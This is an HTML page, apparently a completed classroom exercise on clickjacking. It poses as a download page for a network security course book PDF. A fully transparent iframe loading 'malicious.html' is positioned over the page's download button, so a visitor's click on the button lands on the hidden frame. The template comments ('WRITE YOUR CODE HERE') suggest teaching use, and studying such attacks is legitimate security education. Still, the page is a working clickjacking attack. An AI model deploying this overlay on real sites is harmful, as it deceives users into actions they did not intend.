<!DOCTYPE html>
<html lang="en">
    
<head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f0f0f0;
            margin: 0;
            display: flex;
            flex-direction: column; /* Ensure the header is at the top */
            align-items: center;
            justify-content: center;
            height: 120vh;
        }

        header {
            background-color: #333;
            color: #fff;
            padding: 5px;
            text-align: center;
            width: 100%;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
        }
        

        form {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 300px;
            margin-top: 20px;
        }

        label {
            display: block;
            margin-bottom: 7px;
        }

        input {
            width: 100%;
            padding: 8px;
            margin-bottom: 16px;
            box-sizing: border-box;
            border: 1px solid #ccc;
            border-radius: 4px;
        }

        button {
            background-color: #4caf50;
            color: #fff;
            padding: 10px 15px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        iframe {

            /*FILL IN THE CSS CODE FOR YOUR ELEMENT HERE*/
            position: absolute;
            top: 100px;
            width: 600px; 
            height: 600px; 
            opacity: 0.0;
            z-index: 10; 
        }
    </style>
</head>
<body>
    <header>
        <h1>Download Network Security Course Book PDF</h1>
    </header>

    <form>
        <img src="978-3-540-79698-5.jpg" alt="Description of the image" width="300" height="400">

        <button type="submit">Download PDF</button>
    </form>

<!-- WRITE YOUR CODE HERE -->
<iframe src="malicious.html"></iframe>
</body>
</html>
